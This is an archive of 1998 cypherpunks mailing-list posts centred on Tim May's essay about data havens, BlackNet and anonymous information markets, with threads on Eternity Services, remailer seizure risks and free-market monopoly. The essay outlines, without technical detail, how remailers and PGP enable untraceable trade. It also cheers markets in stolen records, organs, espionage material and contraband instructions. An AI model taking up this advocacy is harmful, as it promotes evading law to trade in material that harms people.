--my Cyphernomicon, available at
http://www.oberlin.edu/~brchkind/cyphernomicon/

--another article, available at
http://www.powergrid.com/1.01/cryptoanarchy.html

--or, the item below, part of a chapter called "True Nyms and Crypto
Anarchy," which may or may not appear in the forthcoming edition of Vernor
Vinge's "True Names." This section discusses data havens, and the BlackNet
experiment in 1993:


DATA HAVENS AND INFORMATION MARKETS

Another science fiction writer, Bruce Sterling, popularized "data havens"
in his 1988 novel, "Islands in the Net." He focussed on _physical_ data
havens, but cyberspace data havens are more interesting, and to likely to
be more important. That they are distributed in many legal jurisdictions,
and may not even be traceable to any particular jurisdiction, is crucial.

A data haven is a place, physical or virtual, where information may be
stored or accessed. The usual connotation is that the data are illegal in
some jurisdictions, but not in the haven.

Data havens and information markets are already springing up, using the
methods described to make information retrievable anonymously and
untraceably. Using networks of remailers and, of course, encryption,
messages may be posted in public forums like the Usenet, and read by anyone
in the world with access, sort of like a cyberspatial "Democracy Wall"
where controversial messages may be posted. These "message pools" are the
main way cyberspatial data havens are implemented. Offers may be in
plaintext, so as to be readable to humans, with instructions on how to
reply (and with a public key to be used). This allows fully-untraceable
markets to develop.

It is likely that services will soon arise which archive articles for fees,
to ensure that a URL (Uniform Resource Locator) is "persistent" over a
period of many years. Ross Anderson's "Eternity Service" provides a means
of distributing the publication of something so that even later attempts to
withdraw all copies are thwarted...this has obvious value in fighting
censorship, but will also have implications when other types of publication
occur (for example, a pirated work would not be withdrawable from the
system, leaving it permanently liberated)

Examples of likely data haven markets are: credit data bases, doctor and
lawyer data bases, and other heavily-regulated (or even unallowed) data
bases. Information on explosives, drug cultivation and processing, methods
for suicide, and other such contraband info. Data havens may also carry
copyrighted material, sans payment to holders, and various national and
trade secrets.

As one example, the "Fair Credit Reporting Act" in the U.S. limits the
length of time credit records may be kept (to 7 or 8 years) and places
various restrictions on what may be collected or reported. What if Alice
"remembers" that Bob, applying for credit from her, declared bankruptcy ten
years earlier, and ran out on various debts? Should she be banned from
taking this into account? What if she accesses a data base which is _not_
bound by the FCRA, perhaps one in a data haven accessible over the Net? Can
Alice "sell" her remembrances to others? (Apparently not, unless she agrees
to the various terms of the FCRA. So much for her First Amendment rights.)
This is the kind of data haven application I expect will develop over the
next several years. It could be in a jurisdiction which ignores such things
as the FCRA, such as a Caribbean island nation, or it could be in
cyberspace,  using various cryptographic protocols, Web proxies, and
remailers for access.

Imagine the market for access to data bases on "bad doctors" and "rip-off
lawyers." There are many interesting issues involved in such data bases:
inaccurate information, responses by those charges, the basis for making
judgements, etc. Some will make malicious, false charges. (This is
ostensibly why such data bases are banned, or heavily regulated.
Governments reserve the rights to make such data available. Of course,
these are the same governments which falsify credit records for government
agents, which give the professional guilds like the American Medical
Association and the American Bar Association the power to stop competitors
from entering their markets, so what else can be expected?)

Information markets match potential buyers and sellers of information. One
experimental "information market" is BlackNet, a system I devised in 1993
as an example of what could be done, as an exercise in guerilla ontology.
It allowed fully-anonymous, two-way exchanges of information of all sorts.
The basic idea was to use a "message pool," a publicly readable place for
messages. By using chains of remailers, messages could be untraceably and
anonymously deposited in such pools, and then read anonymously by others
(because the message pool was broadcast widely, a la Usenet). By including
public keys for later communications, two-way unreadable (to others)
communication could be established, all within the message pool. Such an
information market also acts as a distributed data haven.

As Paul Leyland succinctly described the experiment:

"Tim May showed how mutually anonymous secure information trading could be
implemented with a public forum such as Usenet and with public key
cryptography.  Each information purchaser wishing to take part posts a
sales pitch and a public key to Usenet.  Information to be traded would
then have a public key appended so that a reply can be posted and the whole
encrypted in the public key of the other party.  For anonymity, the keys
should contain no information that links it to an identifiable person.  May
posted a 1024-bit PGP key supposedly belonging to "Blacknet".  As May's
purpose was only educational, he soon admitted authorship."

An example of an item offered for sale early on, in plaintext, was proof
that African diplomats were being blackmailed by the CIA in Washington and
New York. A public key for later communications was included. This is just
one example. There are reports that U.S. authorities have investigated this
market because of its presence on networks at Defense Department research
labs. Not much they can do about it, of course, and more such entities are
expected. The implications for espionage are profound, and largely
unstoppable. Anyone with a home computer and access to the Net or Web, in
various forms, can use these methods to communicate securely, anonymously
or pseudonymously, and with little fear of detection. "Digital dead drops"
can be used to post information obtained, far more securely than the old
physical dead drops...no more messages left in Coke cans at the bases of
trees on remote roads. Payments can also be made untraceably; this of
course opens up the possibility that anyone in any government agency may
act as a part-time spy.

Matching buyers and sellers of organs is another example of such a market,
although one that clearly involves some real-world transfers (and so it
cannot be as untraceable as purely cyberspatial transactions can be). A
huge demand (life and death), but there are various laws tightly
controlling such markets, thus forcing them into Third World nations.
Fortunately, strong cryptography allows market needs to be met without
interference by governments. (Those who are repelled by such markets are of
course free not to patronize them.)

Whistleblowing is another growing use of anonymous remailers, with those
fearing retaliation using remailers to publicly post  their incriminating
information. The Usenet newsgroups "alt.whistleblowing" and
"alt.anonymous.messages" are places where anonymously remailed messages
blowing the whistle have appeared. Of course, there's a fine line between
whistleblowing, revenge, and espionage. Ditto for "leaks" from
highly-placed sources. "Digital Deep Throats" will multiply, and anyone in
Washington, or Paris, or wherever, can make his case safely and anonymously
by digitally leaking material to the press. Gibson foresaw a similar
situation in "Count Zero," where employees of high tech corporations agree
to be ensconced in remote labs, disconnected from the Nets and other
leakage paths. We may see a time when those with security clearances are
explicitly forbidden from using the Net except through firewalled machines,
with monitoring programs running.

Information selling by employees may even take whimsical forms, such as the
selling of topless images of women who flashed for the video cameras on
"Splash Mountain" at Disneyland (now called "Flash Mountain" by some).
Employees of the ride swiped copies of the digital images and uploaded them
anonymously to various Web sites. Ditto for medical records of famous
persons.  DMV records have also been stolen by state employees with access,
and sold to information broker, private investigators, and even curious
fans (the DMV records of notoriously reclusive author Thomas Pynchon showed
up on the Net). Rumors are that information brokers are prepared to pay
handsomely for a CD-ROM containing the U.S. government's "key escrow" data
base.

The larger issue is that mere laws are not adequate to deal with these
kinds of sales of personal information, corporate information, etc. The
bottom line is this: if one wants something kept secret, it must be kept
secret. In a free society, few personal secrets are compelled.
Unfortunately, we have for too long been in a situation where governments
insist that people give out their true names, their various government
identification numbers, their medical situations, and so on. "And who
shall guard the guardians?" The technology of privacy protection can change
this balance of power. Cryptography provides for "personal empowerment," to
use the current phrasing.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 07:47:48 +0800
To: cypherpunks@toad.com
Subject: Re: Eternity Services (fwd)
In-Reply-To: <199801111813.MAA18576@einstein.ssz.com>
Message-ID: <ou16ie71w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

> > From: Tim May <tcmay@got.net>
>
> > under privacy laws, the ECPA, etc. We have not seen any major court orders
> > directed at remailers, but I expect them soon.
>
> Tell that to Julf.

I recall that it was a police request, not a court order, not that it makes
much difference.

However the difference between Julf's remailer and the chained remailers is
that Julf's machine actually contained the database of the real addresses
and anon aliases.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 12 Jan 1998 07:47:45 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A further thought on free markets & anarchy... (fwd)
Message-ID: <199801120013.SAA19485@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 11 Jan 1998 11:40:33 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: A further thought on free markets & anarchy...

> If you begin by assuming that a free market will automagically acquire
> someone with monopoly control who can prevent all competitors from acting,
> you've got a rather different view of free markets than I do,

First, it isn't magic. It is the realization that any market is limited by
several factors (eg number of customers, limited raw resources, startup
costs) and that even a small superiority in one businesses ability to
produce their service or product over time will provide them with an
increased share of those limited resources and the share in profits that
acrue as a result. As their share, and hence their control over, those
resources increases the competitors are faced with the prospect of having
to go to the competitor to get what they need in order to compete.

It is *not* a part of any free market theory that I am aware of that
pre-supposes that a given business entity will, for whatever reason, of its
own free will guarantee the continued existance of competition. If anything
the long term goal of any business is to reduce competition.

If we accept the commen view of free markets and the one you seem to be
saying is the reality, we shouldn't worry about Microsoft. One morning
they'll all wake and realize that if they don't keep HP, Sun, IBM, Apple
in business they won't have competition. As a consequence of that
realization they will in fact provide contracts or other forms of
renumeration to their competitors to keep them in business and hence able to
take potential sales away from Microsoft.

What I am saying is given the environment and goals of operating a
for-profit firm the supposition that a free market will somehow prevent
monopolization is incorrect. I am saying that a free market economy when
operating without outside 3rd party guidance or some form of economic bill
of rights will by its very nature monopolize and reduce competition due to
nothing more than minute superiorities of individual business models and
the efficiency those businesses acrue over time as a result.

> and you're basically assuming that anarchy is unmaintainable in economies,
> from which the obvious conclusion is "so don't even try."

But the free market model as currently understood is an anarchy, at least at
the beginning. The reason that it falls into this category is that there is
no governing body or bill of rights. Each business is left to its own ends
and the consequences thereof. There are no externaly enforced limitations on
business practices in this model. Further, regulation of unfair (whatever
that means in a free market - personaly I thinks its a spin doctorism
equivalent to saying you can have an anarchy without inherent use of
violence) practices is completely abandoned other than the assumption that
eventualy competitors and consumers will learn of those practicies and quite
dealing with that business. The problem with that assumption is that by the
time such practices become known there may be no competitors and the consumers
only option might be to simply have to do without the item completely. In
the case of a life sustaining resource this is no option at all.

> There are people who believe the same about political anarchy.

The point I am making is that the arguments that support political models of
social activity are not mappable to the economic ones in a simple one-to-one
method as the free market model (and many others) assume in a axiomatic
manner. That in fact, because of the inherent limitations of a market which
is not one-to-one mappable to the range of human expression (the field of
social systems) which has no inherent limitations in resources or means
such comparisons are flawed by this axiomatic assumption.

> However, I don't see you presenting any reasoning for the belief
> that a free market will become non-free and acquire a head.

The history of economics is filled with examples of markets without
regulation becoming monopolized. There was the example yesterday or the day
before regarding some rail baron and how they cornered the oil market
because they realized the efficiency advantage of using rail based oil
carriers. Look at Microsoft, the airlines prior to federal regulation.
The the long-haul trucking industry, the teamsters, etc., etc.

> Rather the opposite appears to have been the case in most environments
> where the economic actors don't have political actors supporting
> their bids for monopoly.

Microsoft certainly didn't have political supperiorty? And how can you in
good faith sneak in this concept of 'political superiority' into a discussion
of free markets which a priori and in an axiomatic manner require that such
regulation and their inherent regulatory bodies do *not* exist and most
certainly do not inhibit or otherwise limit the options available to a
commerical enterprise in that market. Smacks of changing the rules in the
middle of the game.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Mon, 12 Jan 1998 07:39:26 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <34B9572E.49F34FBA@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> I would have thought that a much more robust (against the attacks above)
> system would involve:
> 
> - nodes scattered amongst many countries, a la remailers
> 
> - no known publicized nexus (less bait for lawyers,  prosecutors, etc.)
> 
> - changeable nodes, again, a la remailers
> 
> - smaller and cheaper nodes, rather than expensive workstation-class nodes
> 
> - CD-ROMS made of Eternity files and then sold or distributed widely
> 
> - purely cyberspatial locations, with no know nexus
> 
> (I point to my own "BlackNet" experiment as one approach.)
> 
> It may be that the architectures/strategies being considered by Ryan
> Lackey, Adam Back, and others are robust against the attacks described
> above.
>
> ...
> 
> Comments?

There is one thing that comes to mind that was just a topic covered on
this
list and that is the use of cellular/wireless/RF/ham for connections to
said machines.

Obviously, this would make seizure more difficult (and perhaps increase
the
likelyhood of prior warning, if for example, cellular service was
suddenly
cut off).

I am currently studying some parallels between the established FCC
tolerance
of ham radio self-regulation vis-a-vis anonymous remailers.  I haven't
yet
drawn up my opinions, as they are still being formed.  I think that this
might be one avenue to look down as there is obviously a type of legal
precident in what is allowed/tolerated under obvious FCC jursidiction,
whereas the jurisdiction over IP is obviously still ambiguous.
 
--David Miller

middle  rival
devil rim lad

Windows '95 -- a dirty, two-bit operating system.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 12 Jan 1998 11:23:19 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <19980111191317.34304@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Jan 11, 1998 at 03:34:58AM -0500, Matthew L Bennett wrote:
> >If we have to resort to physical violence, 
> >we've
> >already lost!
> 
> No, we wouldn't.  If we had to resort to physical violence against a
> government, than it needs it, you shouldn't need to do that if the
> Constitution is in effect.  Otherwise...
> 
> >Think about it: if we can defend ourselves with guns, why would we 
> >need
> >crypto?
> 
> Because holding up a PGP disk will not save your life if a
> robber/looter/IRS Agent breaks into your house.

Reread the question.

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 12 Jan 1998 09:05:19 +0800
To: cypherpunks@ssz.com
Subject: unit1.html
Message-ID: <199801120129.TAA19851@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   Unit 1: The Scope and Method of Economics [INLINE] UNDER CONSTRUCTION
   
   Read "Case and Fair": Chapter 1 - pages 1-20.
     _________________________________________________________________
   
     
     
     A. Definition of Economics
     
     Economics is the study of how individuals and societies choose to
     use the scarce resources that nature and previous generations have
     provided.
     
     The key word in this definition is "choose".
     
     Economics is a behavioral science.
     
     In large measure it is the study of how people make choices.
     
   
     _________________________________________________________________
   
     
     
     B. Why study economics?
     
     1. To learn a way of thinking: This summer we are going to learn to
     think like economists - to use tools that will help us analyze
     complex situations in the real world of economics.
     
     2. To understand society: Past and present economic decisions have
     an influence on the character of life in a society.
     
     3. To understand global affairs: Understanding international
     relations begins with knowledge of the economic links among
     countries.
     
     4. To be an informed voter: When you participate in the political
     process, you are voting on issues that require a basic understanding
     of economics.
     
   
     _________________________________________________________________
   
     
     
     C. The difference between micro and macro economics
     
     Microeconomics deals with the functioning of individual industries
     and the behavior of individual economic decision-making units -
     business firms and households. It explores the decisions that
     individual businesses and consumers make - firms' choices about what
     to produce and how much to charge, and households' choices about
     what and how much to buy.
     
     Macro economics looks at the economy as a whole. Instead of trying
     to understand what determines the output of a single firm or
     industry, or the consumption patterns of a single household or group
     of house holds, it examines the factors that determine national
     output and income.
     
     While micro economics focuses on individual product prices, macro
     economics looks at the overall price level and its behavior over
     time.
     
     Micro economics questions how many people will be hired or laid off
     in a particular industry and the factors that determine how much
     labor a firm or industry will hire. Macro economics deals with
     aggregate employment and unemployment: how many jobs exist in the
     economy as a whole, and how many people are willing to work but
     unable to find jobs..
     
     We are going to be using this word "aggregate" a lot. It refers to
     the behavior of firms and households taken together. For example,
     aggregate consumption refers to the consumption of all the
     households in the economy; aggregate investment refers to the total
     investment made by all firms in the economy.
     
     There are some topics which micro and macro economics share.
     
     For example, the study of how government policy affects the economy.
     
     However, again micro economics looks at these effects on the level
     of the individual firm or household, macro economics considers the
     effects of policy on the economy as a whole..
     
     The micro economic foundations of macro economics.
     
     There is also another important relationship between the two
     branches of economics and this is what is called the micro economic
     foundations of macro economics. This is a fairly new development and
     one which is trying to reconcile the assumptions and principles of
     micro economic analysis with efforts to understand the economy as a
     whole.
     For example, in efforts to understand inflation, macro economists
     are now trying to include micro economic ideas about the way that
     prices adjust to changes in supply and demand..
     
   
     _________________________________________________________________
   
     
     
     D. The relationship between economics and social philosophy. One of
     the first economists was an Englishman by the name of Adam Smith.
     (Some would say he was the first economist.)
     Born in the early part of the 18th century, Smith developed the idea
     of the "invisible hand" and was the first to describe the
     relationship between supply and demand in a free market economy. He
     described himself as a "social philosopher".
     
     Social philosophy is concerned with fairness. It deals with
     questions such as:
     Why are some people rich and others poor?
     Is it fair that 90% of the country's wealth is controlled by 5% of
     the population?
     Is the progressive income tax, which taxes a higher proportion of
     the income of the wealthy, fair?
     These questions are still relevant and are the subject of economic
     policy.
     
   
     _________________________________________________________________
   
     
     
     E. Economic Policy
     
     A policy is a plan that guides action.
     
     An example of an economic policy would be the Federal government's
     plan to keep the economy working at full employment.
     Anyone can recommend macro economic policies but it is up to
     governments to implement them.
     
     In general we judge the outcomes of any policy according to four
     criteria:
     
     1. Efficiency: In economics we say that a policy is efficient if it
     leads to outcomes that help the economy produce what people want at
     the least possible cost.
     
     2. Equity or fairness: This is obviously hard to define because
     fairness like beauty depends on who's looking, but in general terms
     we could say that an economic policy is fair if it leads to outcomes
     in which the costs and benefits are shared in a way that is
     proportional to a person's participation.
     
     3. Growth: At the present time economic policies are also judged
     according to whether or not they lead to increases in output. I say
     "at present" because some economists are beginning to question the
     assumption that economic growth is always a good thing.
     
     4. Stability: In economics stability is defined as the condition of
     the economy in which output is growing at a steady rate, with low
     inflation and full employment. Currently, the Federal Reserve is
     defining stability as a growth rate of about 3%, with inflation
     between 2% and 3% and unemployment between 5% and 6%.
     
   
     _________________________________________________________________
   
     
     
     F. What economists do. In addition to making policy recommendations,
     economists spend a lot of time formulating theories and developing
     models. These two words have more or less the same meaning in
     economics that they do in other academic disciplines.
     
     A theory is a coherent set of hypotheses which make statements about
     the way the world works.
     
     To illustrate this idea of theory, the text refers to what is known
     as "the law of demand". This so-called law is really just a
     well-tested hypothesis which states that when prices fall, people
     tend to buy more, and vice versa.
     
     A theory is said to be "good" if its hypotheses turn out to valid
     statements about the real world and if it has predictive power.
     
     I should say at this point that very few economic theories,
     particularly in macro economics, have predictive power.
     
     A model is just a formal statement of the theory, usually a
     mathematical statement.
     
     Several institutions have built huge models of the US economy and
     how it works that have hundreds of equations linked together. These
     big models usually run on computers. When we visit the Federal
     Reserve in San Francisco we will see one of these models in action.
     We will also be working with a number of smaller models and a large
     number of pictures of models.
     
     
     
     The text points out two common errors that are made when people
     develop theories or build models. These are:
     
     1. The post hoc fallacy: This mistake is made when someone mistakes
     an association between two variables for a cause and effect
     relationship. My favorite example of this is taken from a study done
     in Holland at the end of WWII which showed a positive relationship
     between the number of storks inhabiting a certain city and the
     number of babies born.
     
     2. The fallacy of composition: This has to do with the belief that
     what is true for the part is also true for the whole. There are many
     examples of this kind of thinking in economics. For example, we have
     seen over a very long period of time the benefits of free markets -
     the efficiencies in individual markets that are created whenever
     people are free to pursue their own self-interest. However, it might
     be a mistake to assume that pursuit of one's own self interest was
     the best thing for society as a whole.
     
     You cannot prove a theory.
     
     It is important to note that neither theories nor models can ever be
     proved beyond the shadow of a doubt. The best we can say of a theory
     is that it is consistent with the facts as currently observed and
     that it is seems to have predictive power.
     
     Another fact about theories is that they are always based on certain
     assumptions which have to be accepted for the theory to work.
     
     For example, in economic theory two of the most important
     assumptions are (1) that people make rational choices based on
     analyzing costs and benefits and (2) that people try to maximize
     utility.
     
     Another important assumption that is rarely discussed is that the
     world of economics can be understood by understanding the behavior
     of discrete variables.
     
     All of these assumptions are now under attack.
     
   
     _________________________________________________________________
   
     
     
     G. Other Important Concepts Introduced in Chapter 1
     
     1. Opportunity Cost: This can be understood as the cost of lost
     opportunities. An example would be the opportunity cost of coming to
     Skyline this summer. This cost is measured by the wages I could have
     been earning if I had decided to work instead.
     
     The reason that opportunity costs exist is because resources are
     scarce; it is an especially important concept in economics where we
     are often trying to measure the costs and benefits of different
     economic choices, policies, etc.
     
     2. Marginal: This refers to the "last unit" and is also an important
     factor in making economic choices.
     
     For example, suppose the publisher of our textbook is trying to
     calculate the costs of producing more books. In making this
     calculation, Prentice Hall would only consider the marginal or
     additional costs of just these new books. The money they have
     already spent would be irrelevant. These are the sunk costs and even
     though they would be included in a calculation of average costs,
     they wouldn't influence the decision to produce additional books.
     
     3. Markets - free and regulated, efficient and inefficient:
     
     Markets can be free or regulated, efficient or inefficient. Most
     markets in the real economy represent some combination of these
     qualities.
     
     A market is said to be free if buyers and sellers are free to come
     together and make deals without government interference.
     
     A regulated market is one where the government sets at least some of
     the rules.
     
     For example, the stock market is relatively free - people can buy
     and sell shares of stock without much interference from the
     government. However, the Securities and Exchange Commission
     establishes many rules in this market, particularly for companies
     who wish to sell their stock.
     
     An efficient market is one in which there is a very rapid
     circulation of information and in which profit opportunities are
     grabbed up almost as soon as they appear. Inefficiencies arise
     wherever the flow of information is restricted and where people are
     not free to take advantage of profit opportunities.
     
     4. Ceteris Paribus: This is a Latin phrase which mean "all else
     equal" and refers to the difficulty of analyzing more than two
     variables at a time. It is trotted out by economists when they want
     to emphasize the fact that they are looking at a single
     relationship, holding everything else constant. For example, "The
     amount of a good or service that people want is inversely related to
     the price, ceteris paribus."
     
     The things that are held constant in this example are the tastes and
     preferences of consumers, the availability of substitutes etc.
     
   
   
   
   
     [LINK] Return to Econ 100 Home page
     
     [LINK] Problem Set for Unit 1
     
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Mon, 12 Jan 1998 08:44:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <34B96667.28BD98CB@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
 
> In terms of "work factor," such connections are nearly worthless. They
> might be a bit harder to trap or trace than typical connections, but they
> are only "security through obscurity" compared to the effort to break a
> typical cipher.

Even if the signals can be distributed on par with the distribution
of the data itself?  Could this be a 'meta' application that has not
been
considered?  Perhaps not, because sigint analysis normally increases an
attacker's intelligence on the subject and doesn't decrease it.

> (Put another way, would you feel safe hosting a child porn site just
> because some of the links were over ham radio or the like? I wouldn't. I'd
> be waiting for the FCC vans to triangulate....or for the cellphone
> companies to "cooperate," as they so often have.)

No, I wouldn't either.  Your point here indicates that whereas
historically
privacy was increased through movement, the reverse may be true now or
at least at some future date.  Namely, that entities are (or will be)
tracked by their movement and not simply location.

--David Miller

middle  rival
devil rim lad

Windows '95 -- a dirty, two-bit operating system.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Sun, 11 Jan 1998 18:32:29 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <eio4ie47w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.980111195738.159F-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 10 Jan 1998, Dr.Dimitri Vulis KOTM wrote:

> ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au> writes:

[...]

> > There is a diffrence.  It is only evoltion if there is a combernation of
> > natural verence and natural selection.  If you have a population of
> > unchanging clones (your typical 'master race') you don't get any evoltion
> > or improvement.
> 
> In case of homo sapiens, it is the same thing.

Of cause, I'm just pedantic enought to point this out.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLiJ76QK0ynCmdStAQFvVQP+Kxu345PppVVJsfBpmDv779NwbdrG5T28
wkxXH1JokaYstwdRFaW3fi84fuBtrqTmQFQpwZ0F3fCyZ3nxPf8aug3AOxqAzdsE
NP4OsTYga5VqP+4ugjzKmjiOZYbyuaSshtFaVHA4wjZ42t7IzBDNWHxOadnNxFFP
qfbbBPpDQuk=
=yQdZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Akasha" <akasha@netsense.net>
Date: Mon, 12 Jan 1998 09:23:42 +0800
To: Tim May <tcmay@got.net>
Subject: Re: (eternity) Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <34B96FB1.46162042@netsense.net>
MIME-Version: 1.0
Content-Type: text/plain





Tim May wrote:

> At 3:06 PM -0800 1/11/98, Adam Back wrote:
>
> >Archiving USENET as a separable enterprise which charges for access
> >(altavista for example charges via advertisements) seems less
> >problematic than directly trying to build a database of controversial
> >materials.  Archiving it all partly reduces your liability I think,
> >because you are not being selective, you just happen to have a
> >business which archives USENET.  However there are two problems with
> >this: a) volume -- USENET daily volume is huge; b) the censors will
> >ask you to remove articles they object to from the archive.
>
> News spool services are already showing signs of getting into this "Usenet
> censorship" business in a bigger way. Some news spool services honor
> cancellations (and some don't).  Some don't carry the "sensitive"
> newsgroups. And so on. Nothing in their setup really exempts them from
> child porn prosecutions--no more so than a bookstore or video store is
> exempted, as the various busts of bookstores and whatnot show, including
> the "Tin Drum" video rental case in Oklahoma City.
>
> >The solution I am using is to keep reposting articles via remailers.
> >Have agents which you pay to repost.  This presents the illusion of
>
> This of course doesn't scale at all well. It is semi-OK for a tiny, sparse
> set of reposted items, but fails utterly for larger database sets. (If and
> when Adam's reposted volumes begin to get significant, he will be viewed as
> a spammer. :-) )
>
> >> - CD-ROMS made of Eternity files and then sold or distributed widely
> >
> >This is an interesting suggestion, but surely would open the
> >distributor up for liability, especially if copyright software were
> >amongst the documents.  Were you thinking of
> >
>
> The CD-ROM distribution is just a side aspect, to get some set of data
> widely dispersed. For example, if the data base is of "abortion" or
> "euthanasia" information (a la Hemlock Society), which various parties want
> suppressed, then handing out freebie CD-ROMs is one step.
>
> Many examples of this: Samizdats in Russia, crypto/PGP diskettes handed out
> at conferences (was Ray Arachelian doing this several years ago?), and
> various religious and social tracts. Obviously, this is what broadsheets
> and fliers are designed to do. Self-publishing in general.
>
> If the intent is to collect money for the data base accesses, then of
> course other considerations come into play.
>
> (Critical to these "Eternity" things is a good model of the customers, the
> reasons for the data, etc.)
>
> >> - purely cyberspatial locations, with no know nexus
> >>
> >> (I point to my own "BlackNet" experiment as one approach.)
> >
> >This is the best option.  Make it entirely distributed, so there is no
> >nexus, period.  cyberspacial -> meatspace mappings are often easier to
> >trace than we would wish, especially where there is continued usage
> >(for example there are various active attacks which can make progress
> >even against mixmaster remailers).  This is the weak point of my
> >reposting agent, be that human, or automated.
>
> My model, contained in the actual working software (*), allowed customers
> to pick some topic, enclose a public key and payment, use a remailer to
> post, then collect the information some time later. Using Usenet, but not
> by reposting the actual data. Only pointers.
>
> (* I say "working" in the sense that the concept was very easy to
> demonstrate just by using PGP and remailers. Not much more than what I
> demonstrated in 1993 would be needed to deploy a real system. Except for
> one thing: true digital cash. Not the bullshit one-way-traceable stuff that
> Chaum and others are now pushing, but the original, online-cleared or
> escrow-cleared form, a la the work of Goldberg et. al. For some of these
> applications, below, simple token- or coupon-based schemes might work
> adequately.)
>
> How these models will work using existing infrastructure (Usenet,
> remailers, Web proxies, etc.) depends on some factors. It might be useful
> to consider some benchmark applications, such as:
>
> 1. Anonymous purchase of financially important data. (A good example being
> the Arbitron ratings for radio markets...subscription to Arbitron is quite
> expensive, and posting of results on Usenet is prosecuted by Arbitron. A
> good example of a BlackNet market.)
>
> 2. Anonymous purchase of long articles, e.g., encycopedia results...
>
> (I'm not sure there's still a market for this....)
>
> 3. Anonymous purchase of "term papers." (A thriving market for ghostwritten
> articles...already migrating to the Web, but lacking adequate anonymizing
> methods.)
>
> This is an example of a very large data base (all term papers on file)
> which cannot possibly by distributed feasibly by Usenet.
>
> And so on...lots of various examples.
>
> The whole Eternity thing is interesting, but we haven't made a lot of
> progress, it seems to me. (I distributed a proposal a bit similar to what
> Ross Anderson was proposing, a proposal more oriented toward making a
> _persistent_ Web URL for academics and lawyers to reliably cite, with less
> of the "404--File Not Found" sorts of messages, the things which make the
> Web largely unusable for academic and scientific citations.)
>
> >> It is also likely in the extreme that a working Eternity service will
> >> quickly be hit with attackers of various sorts who want to test the limits
> >> of the service, or who want such services shut down.
> >
> >I agree with this prediction.  Remailers have seen this pattern, with
> >`baiting' of operators, and apparently people posting controversial
> >materials and reporting the materials to the SPA or others themselves,
> >etc.
>
> Yep, it's hard to disagree with this. Any centralized "Eternity service"
> will be hit with various kinds of attacks in quick order.
>
> Building a data base, as Ryan comments seem to indicate he is mostly
> interested in doing, is the least of the concerns.
>
> --Tim May
>
> The Feds have shown their hand: they want a ban on domestic cryptography
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^2,976,221   | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."



Please remove me from the mailing list.

Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 12 Jan 1998 13:12:04 +0800
To: Ryan Lackey <aba@dcs.ex.ac.uk>
Subject: Re: Eternity Services
In-Reply-To: <199801112306.XAA00525@server.eternity.org>
